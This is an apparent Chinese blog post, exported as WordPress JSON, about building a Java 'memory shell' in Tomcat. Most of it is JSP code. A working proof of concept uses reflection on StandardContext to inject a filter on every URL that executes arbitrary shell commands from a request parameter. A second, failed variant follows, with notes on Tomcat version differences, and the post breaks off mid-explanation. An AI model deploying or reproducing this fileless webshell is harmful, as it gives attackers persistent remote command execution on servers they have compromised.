{"id":1095,"date":"2025-06-15T08:41:53","date_gmt":"2025-06-15T08:41:53","guid":{"rendered":"http:\/\/www.nokws.top\/?p=1095"},"modified":"2025-08-31T03:05:38","modified_gmt":"2025-08-31T03:05:38","slug":"java-neicunmashixian","status":"publish","type":"post","link":"http:\/\/www.nokws.top\/index.php\/2025\/06\/15\/java-neicunmashixian\/","title":{"rendered":"Java \u5185\u5b58\u9a6c\u5b9e\u73b0"},"content":{"rendered":"\n

\u6587\u7ae0\u8bb0\u5f55java\u5185\u5b58\u9a6c\u5b9e\u73b0\u9047\u5230\u7684\u4e00\u4e9b\u95ee\u9898<\/p>\n\n\n\n

0x01 filter\u5185\u5b58\u9a6c<\/h2>\n\n\n\n

\u4e00\u5f00\u59cb\u60f3\u7684\u662f\uff0c\u901a\u8fc7gpt\u76f4\u63a5\u5199\u4e00\u4e2a\u4ee3\u7801\u5c31\u53ef\u4ee5\u8fdb\u884c\u6d4b\u8bd5\uff0c\u5b9e\u9645\u6d4b\u8bd5\u4e0b\u6765\u6548\u679c\u5e76\u4e0d\u597d\uff0c\u4e0d\u5982\u76f4\u63a5\u81ea\u5df1\u624b\u6413\u3002\u4e00\u65b9\u9762\u662fgpt\u5bf9\u5f88\u591a\u7ec6\u8282\u7684\u5185\u5bb9\u5e76\u4e0d\u6e05\u695a\uff0c\u4e00\u5f00\u59cb\u7ed9\u7684\u9700\u6c42\u662f\u901a\u8fc7servlet api\u52a8\u6001\u6ce8\u518cfilter\uff0c\u5b9e\u9645\u6d4b\u8bd5\u4e0b\u6765filter\u4e2d\u65e0\u6cd5\u5b9e\u73b0\uff0c\u52a8\u6001\u6ce8\u518c\u5fc5\u987b\u5728 Servlet \u5bb9\u5668\u542f\u52a8\u671f\u95f4\u5b8c\u6210\uff08\u901a\u8fc7ServletContainerInitializer<\/code>\u6216ServletContextListener<\/code>\uff09\u3002\u53e6\u4e00\u65b9\u9762\u662fgpt\u5bf9\u4ee3\u7801\u5b9e\u73b0\u7684\u4fa7\u91cd\u70b9\u4e0d\u540c\u3002<\/p>\n\n\n\n

poc<\/p>\n\n\n\n

<%@ page import=\"java.util.*,\n                 javax.servlet.*,\n                 javax.servlet.http.*,\n                 java.io.*,\n                 java.lang.reflect.*,\n                 org.apache.tomcat.util.descriptor.web.FilterDef,\n                 org.apache.tomcat.util.descriptor.web.FilterMap,\n                 org.apache.catalina.core.ApplicationContext, \n                 org.apache.catalina.core.ApplicationFilterConfig,\n                 org.apache.catalina.core.StandardContext,\n                 org.apache.catalina.Context\" %>\n<%@ page pageEncoding=\"UTF-8\" contentType=\"text\/html;charset=UTF-8\" %>\n<!DOCTYPE html>\n<html>\n<head>\n    <title>\u52a8\u6001Filter\u547d\u4ee4\u6267\u884c<\/title>\n    <style>\n        .success {\n            color: green;\n        }\n\n        .error {\n            color: red;\n        }\n\n        pre {\n            background-color: #f5f5f5;\n            padding: 10px;\n            border: 1px solid #ddd;\n        }\n    <\/style>\n<\/head>\n<body>\n<h2>\u52a8\u6001Filter\u547d\u4ee4\u6267\u884c<\/h2>\n\n<%\n    final String filterName = \"CommandExecutorFilter\";\n    try {\n        \/\/ \u83b7\u53d6Servlet\u4e0a\u4e0b\u6587\n        ServletContext context = request.getServletContext();\n\n\n        \/\/ \u4f7f\u7528\u53cd\u5c04\u83b7\u53d6StandardContext (Tomcat\u7279\u5b9a)\n        Field contextField = context.getClass().getDeclaredField(\"context\");\n        \/\/contextField.setAccessible(true);\n        \/\/StandardContext standardContext = (StandardContext) contextField.get(context);\n\n\n        contextField.setAccessible(true);\n        Object applicationContext = contextField.get(context);\n\n        \/\/ \u4eceApplicationContext\u4e2d\u83b7\u53d6StandardContext\n        Field standardContextField = applicationContext.getClass().getDeclaredField(\"context\");\n        standardContextField.setAccessible(true);\n        StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);\n\n        Field Configs = standardContext.getClass().getDeclaredField(\"filterConfigs\");\n        Configs.setAccessible(true);\n        Map filterConfigs = (Map) Configs.get(standardContext);\n\n\n        \/\/ \u52a0\u8f7d\u5fc5\u8981\u7684\u7c7b\n        \/\/ClassLoader cl = Thread.currentThread().getContextClassLoader();\n        \/\/Class<?> filterDefClass = cl.loadClass(\"org.apache.tomcat.util.descriptor.web.FilterDef\");\n        \/\/Class<?> filterMapClass = cl.loadClass(\"org.apache.tomcat.util.descriptor.web.FilterMap\");\n\n\n        \/\/ \u5b9a\u4e49\u547d\u4ee4\u6267\u884cFilter (\u5185\u90e8\u7c7b)\n        class CommandExecutorFilter implements Filter {\n            @Override\n            public void init(FilterConfig config) throws ServletException {\n            }\n            \n\n            @Override\n\/\/            public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)\n\/\/                    throws IOException, ServletException {\n\/\/                HttpServletRequest httpReq = (HttpServletRequest) req;\n\/\/                String command = httpReq.getParameter(\"cmd\");\n\/\/                if (command != null) {\n\/\/                    res.setContentType(\"text\/plain;charset=UTF-8\");\n\/\/                    PrintWriter out = res.getWriter();\n\/\/                    Process process = null;\n\/\/                    BufferedReader reader = null;\n\/\/\n\/\/                    try {\n\/\/                        \/\/ \u6839\u636e\u64cd\u4f5c\u7cfb\u7edf\u9009\u62e9\u547d\u4ee4\u89e3\u91ca\u5668\n\/\/                        String os = System.getProperty(\"os.name\").toLowerCase();\n\/\/                        String[] cmd = os.contains(\"win\")\n\/\/                                ? new String[]{\"cmd\", \"\/c\", command}\n\/\/                                : new String[]{\"\/bin\/sh\", \"-c\", command};\n\/\/\n\/\/                        ProcessBuilder pb = new ProcessBuilder(cmd);\n\/\/                        pb.redirectErrorStream(true); \/\/ \u5408\u5e76\u9519\u8bef\u6d41\u5230\u8f93\u51fa\u6d41\n\/\/                        process = pb.start();\n\/\/\n\/\/                        \/\/ \u8bfb\u53d6\u547d\u4ee4\u8f93\u51fa\n\/\/                        reader = new BufferedReader(new InputStreamReader(process.getInputStream(), \"UTF-8\"));\n\/\/                        StringBuilder output = new StringBuilder();\n\/\/                        String line;\n\/\/                        while ((line = reader.readLine()) != null) {\n\/\/                            output.append(line).append(\"\\n\");\n\/\/                        }\n\/\/\n\/\/                        int exitCode = process.waitFor();\n\/\/                        out.println(\"\u547d\u4ee4\u6267\u884c\u7ed3\u679c (\u9000\u51fa\u7801: \" + exitCode + \"):\\n\" + output.toString());\n\/\/                        out.flush();\n\/\/                    } catch (Exception e) {\n\/\/                        out.println(\"\u6267\u884c\u547d\u4ee4\u65f6\u51fa\u9519: \" + e.getMessage());\n\/\/                    } finally {\n\/\/                        if (reader != null) try { reader.close(); } catch (IOException e) {}\n\/\/                        if (process != null) process.destroy();\n\/\/                    }\n\/\/                    return;\n\/\/                }\n\/\/                chain.doFilter(req, res);\n\/\/            }\n            public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)\n                    throws IOException, ServletException {\n                HttpServletRequest httpReq = (HttpServletRequest) req;\n                String command = httpReq.getParameter(\"cmd\");\n                if (command != null) {\n                    res.setContentType(\"text\/plain;charset=UTF-8\");\n                    PrintWriter out = res.getWriter();\n                    Process process = null;\n                    BufferedReader reader = null;\n\n                    try {\n                        \/\/ \u6839\u636e\u64cd\u4f5c\u7cfb\u7edf\u9009\u62e9\u547d\u4ee4\u89e3\u91ca\u5668\n                        String os = System.getProperty(\"os.name\").toLowerCase();\n                        String[] cmd = os.contains(\"win\")\n                                ? new String[]{\"cmd\", \"\/c\", command}\n                                : new String[]{\"\/bin\/sh\", \"-c\", command};\n\n                        ProcessBuilder pb = new ProcessBuilder(cmd);\n                        pb.redirectErrorStream(true); \/\/ \u5408\u5e76\u9519\u8bef\u6d41\u5230\u8f93\u51fa\u6d41\n                        process = pb.start();\n\n                        \/\/ \u8bfb\u53d6\u547d\u4ee4\u8f93\u51fa\n                        reader = new BufferedReader(new InputStreamReader(process.getInputStream(), \"UTF-8\"));\n                        StringBuilder output = new StringBuilder();\n                        String line;\n                        while ((line = reader.readLine()) != null) {\n                            output.append(line).append(\"\\n\");\n                        }\n\n                        int exitCode = process.waitFor();\n                        out.println(\"\u547d\u4ee4\u6267\u884c\u7ed3\u679c (\u9000\u51fa\u7801: \" + exitCode + \"):\\n\" + output.toString());\n                        out.flush();\n                    } catch (Exception e) {\n                        out.println(\"\u6267\u884c\u547d\u4ee4\u65f6\u51fa\u9519: \" + e.getMessage());\n                    } finally {\n                        if (reader != null) try { reader.close(); } catch (IOException e) {}\n                        if (process != null) process.destroy();\n                    }\n                    return;\n                }\n                chain.doFilter(req, res);\n            }\n\n            @Override\n            public void destroy() {\n            }\n        }\n\n\n        \/\/ \u8bbe\u7f6eFilter\u5b9e\u4f8b\n        FilterDef filterDef = new FilterDef();\n        filterDef.setFilterName(\"CommandExecutorFilter\");\n        filterDef.setFilter(new CommandExecutorFilter());\n        standardContext.addFilterDef(filterDef);\n\n        FilterMap filterMap = new org.apache.tomcat.util.descriptor.web.FilterMap();\n        filterMap.setFilterName(\"CommandExecutorFilter\");\n        filterMap.addURLPattern(\"\/*\");\n        standardContext.addFilterMapBefore(filterMap);\n\n\n        Constructor<ApplicationFilterConfig> constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);\n        constructor.setAccessible(true);\n        ApplicationFilterConfig filterConfig = constructor.newInstance(standardContext, filterDef);\n        filterConfigs.put(filterName, filterConfig);\n\n        out.println(\"<p class='success'>\u547d\u4ee4\u6267\u884cFilter\u5df2\u6210\u529f\u6ce8\u518c\uff01<\/p>\");\n        out.println(\"<p>\u8bf7\u91cd\u65b0\u8bbf\u95ee\u6b64\u9875\u9762\u6267\u884c\u547d\u4ee4<\/p>\");\n\n\n    } catch (Exception e) {\n        out.println(\"<p class='error'>\u6267\u884c\u8fc7\u7a0b\u4e2d\u51fa\u9519: \" + e.getMessage() + \"<\/p>\");\n        e.printStackTrace();\n    }\n%>\n\n<h3>\u64cd\u4f5c\u6b65\u9aa4<\/h3>\n<ol>\n    <li>\u6ce8\u518c\u6210\u529f\u540e\uff0c\u4f7f\u7528\u4ee5\u4e0bURL\u6267\u884c\u547d\u4ee4\uff1a<\/li>\n    <ul>\n        <li><code>\/dynamicfilter.jsp?command=ls<\/code> (Linux\/Mac)<\/li>\n        <li><code>\/dynamicfilter.jsp?command=dir<\/code> (Windows)<\/li>\n    <\/ul>\n<\/ol>\n\n<\/body>\n<\/html><\/pre>\n\n\n\n
\u95ee\u98981<\/strong> tomcat\u7248\u672c\u95ee\u9898\uff1a
 \u5728\u8f83\u65b0\u7684Tomcat\u7248\u672c\uff088.x\u53ca\u4ee5\u4e0a\uff09\u4e2d\uff0cFilterDef \u548c FilterMap \u7c7b\u5df2\u7ecf\u4ece org.apache.catalina.deploy \u5305\u79fb\u52a8\u5230\u4e86 org.apache.tomcat.util.descriptor.web \u5305<\/p>\n\n\n\n
\u95ee\u98982<\/strong> Servlet API \u63d0\u4f9b\u7684\u52a8\u6001\u6ce8\u518c\u673a\u5236\u4e0d\u9002\u7528\uff0c\u8bbf\u95eejsp\u6587\u4ef6\u65f6\u5bb9\u5668\u5df2\u7ecf\u751f\u6210\u3002\u65e0\u6cd5\u5c06\u7b5b\u9009\u5668\u6dfb\u52a0\u5230\u4e0a\u4e0b\u6587\uff0c\u56e0\u4e3a\u8be5\u4e0a\u4e0b\u6587\u5df2\u521d\u59cb\u5316<\/strong><\/p>\n\n\n\n
failpoc<\/p>\n\n\n\n
<%@ page import=\"java.util.*, javax.servlet.*, javax.servlet.http.*, \n                java.lang.reflect.*, java.io.*\" %>  \/\/ \u65b0\u589ejava.io.*\n<!DOCTYPE html>\n<html>\n<head>\n    <title>\u547d\u4ee4\u6267\u884cFilter<\/title>\n    <style>\n        .success { color: green; }\n        .error { color: red; }\n        pre { background-color: #f5f5f5; padding: 10px; border: 1px solid #ddd; overflow-x: auto; }\n    <\/style>\n<\/head>\n<body>\n    <h2>\u547d\u4ee4\u6267\u884cFilter<\/h2>\n    \n    <%\n        \/\/ \u8bbe\u7f6e\u54cd\u5e94\u7f16\u7801\n        response.setContentType(\"text\/html;charset=UTF-8\");\n        request.setCharacterEncoding(\"UTF-8\");\n        \n        try {\n            \/\/ \u83b7\u53d6Servlet\u4e0a\u4e0b\u6587\n            ServletContext context = request.getServletContext();\n            \n            \/\/ \u83b7\u53d6StandardContext\u5b9e\u4f8b\uff08\u9002\u7528\u4e8eTomcat\u5bb9\u5668\uff09\n            Field contextField = context.getClass().getDeclaredField(\"context\");\n            contextField.setAccessible(true);\n            Object standardContext = contextField.get(context);\n            \n            \/\/ \u52a0\u8f7d\u5fc5\u8981\u7684\u7c7b\n            ClassLoader cl = Thread.currentThread().getContextClassLoader();\n            Class<?> filterDefClass = cl.loadClass(\"org.apache.catalina.deploy.FilterDef\");\n            Class<?> filterMapClass = cl.loadClass(\"org.apache.catalina.deploy.FilterMap\");\n            \n            \/\/ \u521b\u5efaFilter\u5b9a\u4e49\n            Object filterDef = filterDefClass.getDeclaredConstructor().newInstance();\n            filterDefClass.getMethod(\"setFilterName\", String.class).invoke(filterDef, \"CommandExecutorFilter\");\n            filterDefClass.getMethod(\"setFilterClass\", String.class).invoke(filterDef, \"CommandExecutorFilter\");\n            \n            \/\/ \u5b9a\u4e49\u547d\u4ee4\u6267\u884cFilter\n            class CommandExecutorFilter implements Filter {\n                @Override\n                public void init(FilterConfig config) throws ServletException {}\n                \n                @Override\n                public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain) \n                        throws IOException, ServletException {  \/\/ \u73b0\u5728\u53ef\u4ee5\u6b63\u786e\u8bc6\u522b\u5f02\u5e38\u7c7b\u578b\n                    HttpServletRequest httpReq = (HttpServletRequest) req;\n                    \n                    \/\/ \u68c0\u67e5GET\u8bf7\u6c42\u4e2d\u7684command\u53c2\u6570\n                    if (\"GET\".equalsIgnoreCase(httpReq.getMethod())) {\n                        String command = httpReq.getParameter(\"command\");\n                        if (command != null && !command.trim().isEmpty()) {\n                            try {\n                                \/\/ \u8bbe\u7f6e\u54cd\u5e94\u683c\u5f0f\n                                res.setContentType(\"text\/plain;charset=UTF-8\");\n                                PrintWriter out = res.getWriter();\n                                \n                                \/\/ \u6267\u884c\u7cfb\u7edf\u547d\u4ee4\n                                Process process;\n                                String os = System.getProperty(\"os.name\").toLowerCase();\n                                String[] cmd;\n                                \n                                if (os.contains(\"win\")) {\n                                    cmd = new String[] {\"cmd\", \"\/c\", command};\n                                } else {\n                                    cmd = new String[] {\"\/bin\/sh\", \"-c\", command};\n                                }\n                                \n                                process = Runtime.getRuntime().exec(cmd);\n                                \n                                \/\/ \u83b7\u53d6\u547d\u4ee4\u8f93\u51fa\n                                BufferedReader reader = new BufferedReader(\n                                        new InputStreamReader(process.getInputStream()));\n                                StringBuilder output = new StringBuilder();\n                                String line;\n                                \n                                while ((line = reader.readLine()) != null) {\n                                    output.append(line).append(\"\\n\");\n                                }\n                                \n                                \/\/ \u83b7\u53d6\u9519\u8bef\u8f93\u51fa\n                                BufferedReader errorReader = new BufferedReader(\n                                        new InputStreamReader(process.getErrorStream()));\n                                StringBuilder error = new StringBuilder();\n                                \n                                while ((line = errorReader.readLine()) != null) {\n                                    error.append(line).append(\"\\n\");\n                                }\n                                \n                                \/\/ \u7b49\u5f85\u547d\u4ee4\u6267\u884c\u5b8c\u6210\n                                int exitCode = process.waitFor();\n                                \n                                \/\/ \u8fd4\u56de\u7ed3\u679c\n                                out.println(\"\u547d\u4ee4: \" + command);\n                                out.println(\"\u9000\u51fa\u4ee3\u7801: \" + exitCode);\n                                \n                                if (output.length() > 0) {\n                                    out.println(\"\\n\u6807\u51c6\u8f93\u51fa:\\n\" + output.toString());\n                                }\n                                \n                                if (error.length() > 0) {\n                                    out.println(\"\\n\u9519\u8bef\u8f93\u51fa:\\n\" + error.toString());\n                                }\n                                \n                                return; \/\/ \u7ec8\u6b62\u8bf7\u6c42\u5904\u7406\u94fe\n                            } catch (Exception e) {\n                                res.getWriter().println(\"\u6267\u884c\u547d\u4ee4\u65f6\u51fa\u9519: \" + e.getMessage());\n                                e.printStackTrace();\n                            }\n                        }\n                    }\n                    \n                    \/\/ \u7ee7\u7eed\u8bf7\u6c42\u5904\u7406\u94fe\n                    chain.doFilter(req, res);\n                }\n                \n                @Override\n                public void destroy() {}\n            }\n            \n            \/\/ \u8bbe\u7f6eFilter\u5b9e\u4f8b\n            filterDefClass.getMethod(\"setFilter\", Filter.class).invoke(filterDef, new CommandExecutorFilter());\n            \n            \/\/ \u6dfb\u52a0Filter\u5b9a\u4e49\u5230\u4e0a\u4e0b\u6587\n            standardContext.getClass().getMethod(\"addFilterDef\", filterDefClass).invoke(standardContext, filterDef);\n            \n            \/\/ \u521b\u5efaFilter\u6620\u5c04\n            Object filterMap = filterMapClass.getDeclaredConstructor().newInstance();\n            filterMapClass.getMethod(\"setFilterName\", String.class).invoke(filterMap, \"CommandExecutorFilter\");\n            filterMapClass.getMethod(\"addURLPattern\", String.class).invoke(filterMap, \"\/*\");\n            filterMapClass.getMethod(\"setDispatcher\", String.class).invoke(filterMap, \"REQUEST\");\n            \n            \/\/ \u6dfb\u52a0Filter\u6620\u5c04\n            standardContext.getClass().getMethod(\"addFilterMapBefore\", filterMapClass).invoke(standardContext, filterMap);\n            \n            out.println(\"<p class='success'>\u547d\u4ee4\u6267\u884cFilter\u5df2\u6dfb\u52a0\uff01<\/p>\");\n            out.println(\"<p>\u73b0\u5728\u53ef\u4ee5\u901a\u8fc7\u8bbf\u95ee ?command=your_command \u6765\u6267\u884c\u7cfb\u7edf\u547d\u4ee4<\/p>\");\n            \n        } catch (Exception e) {\n            out.println(\"<p class='error'>\u6dfb\u52a0Filter\u5931\u8d25: \" + e.getMessage() + \"<\/p>\");\n            e.printStackTrace();\n        }\n    %>\n    \n    <h3>\u4f7f\u7528\u8bf4\u660e<\/h3>\n    <p>\u53ef\u4ee5\u901a\u8fc7\u5728URL\u4e2d\u6dfb\u52a0command\u53c2\u6570\u6765\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u4f8b\u5982\uff1a<\/p>\n    <pre>http:\/\/your-server\/your-app\/this-page.jsp?command=dir<\/pre>\n    <pre>http:\/\/your-server\/your-app\/this-page.jsp?command=ls -l<\/pre>\n    \n    <div class=\"warning\">\n        <h3 style=\"color:red\">\u8b66\u544a!<\/h3>\n        <p>\u6b64\u529f\u80fd\u5177\u6709\u6781\u9ad8\u7684\u5b89\u5168\u98ce\u9669\uff0c\u53ef\u80fd\u5bfc\u81f4\u670d\u52a1\u5668\u88ab\u653b\u51fb\u548c\u6570\u636e\u6cc4\u9732\u3002<\/p>\n        <p>\u8bf7\u4ec5\u5728\u5b89\u5168\u7684\u6d4b\u8bd5\u73af\u5883\u4e2d\u4f7f\u7528\uff0c\u4e0d\u8981\u5728\u751f\u4ea7\u73af\u5883\u90e8\u7f72\u3002<\/p>\n    <\/div>\n<\/body>\n<\/html><\/pre>\n\n\n\n
\u8fd9\u4e2apoc\u5931\u8d25\u6700\u4e3b\u8981\u7684\u539f\u56e0\u662ffilter\u6ca1\u6709\u6b63\u786e\u7684\u6ce8\u518c\uff0c\u7f3a\u5c11\u4e86filterConfigs\u7684\u8bbe\u7f6e<\/strong><\/p>\n\n\n\n
    \n
  1. Tomcat\u7684Filter\u5de5\u4f5c\u673a\u5236<\/strong>\uff1a\n